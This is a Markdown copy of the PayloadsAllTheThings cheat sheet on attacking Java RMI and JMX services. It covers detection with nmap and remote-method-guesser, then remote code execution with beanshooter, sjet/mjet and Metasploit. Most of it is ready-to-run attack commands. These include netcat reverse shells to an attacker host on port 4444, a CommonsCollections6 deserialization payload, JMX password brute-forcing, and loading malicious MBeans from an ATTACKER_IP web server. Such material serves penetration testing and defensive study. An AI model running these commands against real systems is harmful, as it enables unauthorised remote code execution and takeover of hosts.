index.md (7391B)
1 --- 2 title: "Java RMI" 3 topic: "Java RMI" 4 topicSlug: "java-rmi" 5 sourcePath: "Java RMI/README.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/Java%20RMI/README.md" 7 sha: "3ac27901c711" 8 isReadme: true 9 --- 10 11 # Java RMI 12 13 > Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they're on different physical machines. RMI provides a mechanism for Java-based distributed computing. 14 15 ## Summary 16 17 * [Tools](#tools) 18 * [Detection](#detection) 19 * [Methodology](#methodology) 20 * [RCE using beanshooter](#rce-using-beanshooter) 21 * [RCE using sjet/mjet](#rce-using-sjet-or-mjet) 22 * [RCE using Metasploit](#rce-using-metasploit) 23 * [References](#references) 24 25 ## Tools 26 27 * [siberas/sjet](https://github.com/siberas/sjet) - siberas JMX exploitation toolkit 28 * [mogwailabs/mjet](https://github.com/mogwailabs/mjet) - MOGWAI LABS JMX exploitation toolkit 29 * [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) - Java RMI Vulnerability Scanner 30 * [qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) - JMX enumeration and attacking tool. 31 32 ## Detection 33 34 * Using [nmap](https://nmap.org/): 35 36 ```powershell 37 $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v 38 1089/tcp open java-rmi Java RMI 39 | rmi-vuln-classloader: 40 | VULNERABLE: 41 | RMI registry default configuration remote code execution vulnerability 42 | State: VULNERABLE 43 | Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution. 44 | rmi-dumpregistry: 45 | jmxrmi 46 | javax.management.remote.rmi.RMIServerImpl_Stub 47 ``` 48 49 * Using [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser): 50 51 ```bash 52 $ rmg scan 172.17.0.2 --ports 0-65535 53 [+] Scanning 6225 Ports on 172.17.0.2 for RMI services. 54 [+] [HIT] Found RMI service(s) on 172.17.0.2:40393 (DGC) 55 [+] [HIT] Found RMI service(s) on 172.17.0.2:1090 (Registry, DGC) 56 [+] [HIT] Found RMI service(s) on 172.17.0.2:9010 (Registry, Activator, DGC) 57 [+] [6234 / 6234] [#############################] 100% 58 [+] Portscan finished. 59 60 $ rmg enum 172.17.0.2 9010 61 [+] RMI registry bound names: 62 [+] 63 [+] - plain-server2 64 [+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) 65 [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711] 66 [+] - legacy-service 67 [+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class) 68 [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309] 69 [+] - plain-server 70 [+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) 71 [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813] 72 [...] 73 ``` 74 75 * Using [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework) 76 77 ```bash 78 use auxiliary/scanner/misc/java_rmi_server 79 set RHOSTS <IPs> 80 set RPORT <PORT> 81 run 82 ``` 83 84 ## Methodology 85 86 If a Java Remote Method Invocation (RMI) service is poorly configured, it becomes vulnerable to various Remote Code Execution (RCE) methods. One method involves hosting an MLet file and directing the JMX service to load MBeans from a distant server, achievable using tools like mjet or sjet. The remote-method-guesser tool is newer and combines RMI service enumeration with an overview of recognized attack strategies. 87 88 ### RCE using beanshooter 89 90 * List available attributes: `beanshooter info 172.17.0.2 9010` 91 * Display value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose` 92 * Set the value of an attribute: `beanshooter attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean` 93 * Bruteforce a password protected JMX service: `beanshooter brute 172.17.0.2 1090` 94 * List registered MBeans: `beanshooter list 172.17.0.2 9010` 95 * Deploy an MBean: `beanshooter deploy 172.17.0.2 9010 non.existing.example.ExampleBean qtc.test:type=Example --jar-file exampleBean.jar --stager-url http://172.17.0.1:8000` 96 * Enumerate JMX endpoint: `beanshooter enum 172.17.0.2 1090` 97 * Invoke method on a JMX endpoint: `beanshooter invoke 172.17.0.2 1090 com.sun.management:type=DiagnosticCommand --signature 'vmVersion()'` 98 * Invoke arbitrary public and static Java methods: 99 100 ```ps1 101 beanshooter model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")' 102 beanshooter invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()' 103 ``` 104 105 * Standard MBean execution: `beanshooter standard 172.17.0.2 9010 exec 'nc 172.17.0.1 4444 -e ash'` 106 * Deserialization attacks on a JMX endpoint: `beanshooter serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --username admin --password admin` 107 108 ### RCE using sjet or mjet 109 110 #### Requirements 111 112 * Jython 113 * The JMX server can connect to a http service that is controlled by the attacker 114 * JMX authentication is not enabled 115 116 #### Remote Command Execution 117 118 The attack involves the following steps: 119 120 * Starting a web server that hosts the MLet and a JAR file with the malicious MBeans 121 * Creating a instance of the MBean `javax.management.loading.MLet` on the target server, using JMX 122 * Invoking the `getMBeansFromURL` method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file. 123 * The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX. 124 * The attacker finally invokes methods from the malicious MBean. 125 126 Exploit the JMX using [siberas/sjet](https://github.com/siberas/sjet) or [mogwailabs/mjet](https://github.com/mogwailabs/mjet) 127 128 ```powershell 129 jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000 130 jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la" 131 jython sjet.py TARGET_IP TARGET_PORT super_secret shell 132 jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password 133 jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall 134 jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx" 135 136 jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000 137 jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami" 138 jython mjet.py TARGET_IP TARGET_PORT command super_secret shell 139 ``` 140 141 ### RCE using Metasploit 142 143 ```bash 144 use exploit/multi/misc/java_rmi_server 145 set RHOSTS <IPs> 146 set RPORT <PORT> 147 # configure also the payload if needed 148 run 149 ``` 150 151 ## References 152 153 * [Attacking RMI based JMX services - Hans-Martin Münch - April 28, 2019](https://web.archive.org/web/20201024121233/https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/) 154 * [JMX RMI - MULTIPLE APPLICATIONS RCE - Red Timmy Security - March 26, 2019](https://web.archive.org/web/20250523025328/https://www.exploit-db.com/docs/english/46607-jmx-rmi-%E2%80%93-multiple-applications-remote-code-execution.pdf) 155 * [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel - August 15, 2021](https://web.archive.org/web/20210817144943/https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal)